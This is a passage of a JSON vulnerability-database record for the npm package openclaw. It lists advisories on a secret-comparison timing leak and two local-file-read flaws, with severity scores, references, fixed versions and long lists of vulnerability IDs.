-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.23"}],"aliases":["GHSA-9gvx-vj57-vqqx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8z7r-a8dv-eueb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89861?format=json","vulnerability_id":"VCID-96jd-x87b-s3ey","summary":"OpenClaw: Shared-secret comparison call sites leaked length information through timing\n## Summary\n\nBefore OpenClaw 2026.4.2, several shared-secret comparison call sites still used early length-mismatch checks instead of the shared fixed-length comparison helper. Those paths could leak secret-length information through measurable timing differences.\n\n## Impact\n\nThe affected paths exposed a low-severity timing side channel on secret comparison. The issue did not by itself demonstrate auth bypass, but it weakened the intended constant-time handling for shared secrets.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `be10ecef770a4654519869c3641bbb91087c8c7b` — reuse the shared secret comparison helper at affected call sites\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41407","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12878","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12844","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12883","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41407"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/be10ecef770a4654519869c3641bbb91087c8c7b","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:53:09Z/"}],"url":"https://github.com/openclaw/openclaw/commit/be10ecef770a4654519869c3641bbb91087c8c7b"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jj6q-rrrf-h66h","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:53:09Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jj6q-rrrf-h66h"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41407","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41407"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-timing-side-channel-in-shared-secret-comparison","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:53:09Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-timing-side-channel-in-shared-secret-comparison"},{"reference_url":"https://github.com/advisories/GHSA-jj6q-rrrf-h66h","reference_id":"GHSA-jj6q-rrrf-h66h","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jj6q-rrrf-h66h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-41407","GHSA-jj6q-rrrf-h66h"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-96jd-x87b-s3ey"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89964?format=json","vulnerability_id":"VCID-9hcd-uj62-8yeu","summary":"OpenClaw: QQBot media tags could read arbitrary local files through reply text\n## Summary\n\nQQBot media tags could read arbitrary local files through reply text.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nQQBot outbound media tags in AI reply text could reference host-local paths outside the intended media storage boundary, allowing local file disclosure through outbound media handling.\n\n## Technical Details\n\nThe fix enforces the media storage boundary for all outbound QQBot local file paths.\n\n## Fix\n\nThe issue was fixed in #63271. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `604777e4414cc3b2ff8861f18f4fb04374c702c6`\n- PR: #63271\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @feiyang666 of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43533","reference_id":"","reference_type":"","scores":[{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.18803","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00064","scoring_system":"epss","scoring_elements":"0.20219","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00064","scoring_system":"epss","scoring_elements":"0.20258","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43533"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/604777e4414cc3b2ff8861f18f4fb04374c702c6","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"8.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:41:49Z/"}],"url":"https://github.com/openclaw/openclaw/commit/604777e4414cc3b2ff8861f18f4fb04374c702c6"},{"reference_url":"https://github.com/openclaw/openclaw/pull/63271","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/63271"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-66r7-m7xm-v49h","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"8.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:41:49Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-66r7-m7xm-v49h"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43533","reference_id":"CVE-2026-43533","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43533"},{"reference_url":"https://github.com/advisories/GHSA-66r7-m7xm-v49h","reference_id":"GHSA-66r7-m7xm-v49h","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-66r7-m7xm-v49h"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-local-file-read-via-qqbot-media-tags","reference_id":"openclaw-arbitrary-local-file-read-via-qqbot-media-tags","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"8.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:41:49Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-local-file-read-via-qqbot-media-tags"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["CVE-2026-43533","GHSA-66r7-m7xm-v49h"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9hcd-uj62-8yeu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90860?format=json","vulnerability_id":"VCID-9jjv-aa8k-rke1","summary":"OpenClaw's message tool media parameter bypasses tool policy filesystem isolation\n## Summary\n\nThe message tool accepted `mediaUrl` and `fileUrl` aliases without applying the same sandbox localRoots validation as the canonical media path handling.\n\n## Impact\n\nA caller constrained to sandbox media roots could read arbitrary local files by routing them through the alias parameters.\n\n## Affected Component\n\n`src/infra/outbound/message-action-params.ts, src/infra/outbound/message-action-runner.ts`\n\n## Fixed Versions\n\n- Affected: `< 2026.3.24`\n- Patched: `>= 2026.3.24`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `1d7cb6fc03` (`fix: close sandbox media root bypass for mediaUrl/fileUrl aliases`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33581","reference_id":"","reference_type":"","scores":[{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17246","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17243","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00063","scoring_system":"epss","scoring_elements":"0.19689","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33581"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/1d7cb6fc03552bbba00e7cffb3aa9741f5556416","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:29:20Z/"}],"url":"https://github.com/openclaw/openclaw/commit/1d7cb6fc03552bbba00e7cffb3aa9741f5556416"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v8wv-jg3q-qwpq","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:29:20Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v8wv-jg3q-qwpq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33581","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33581"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-mediaurl-and-fileurl-parameters","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:29:20Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-mediaurl-and-fileurl-parameters"},{"reference_url":"https://github.com/advisories/GHSA-v8wv-jg3q-qwpq","reference_id":"GHSA-v8wv-jg3q-qwpq","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v8wv-jg3q-qwpq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7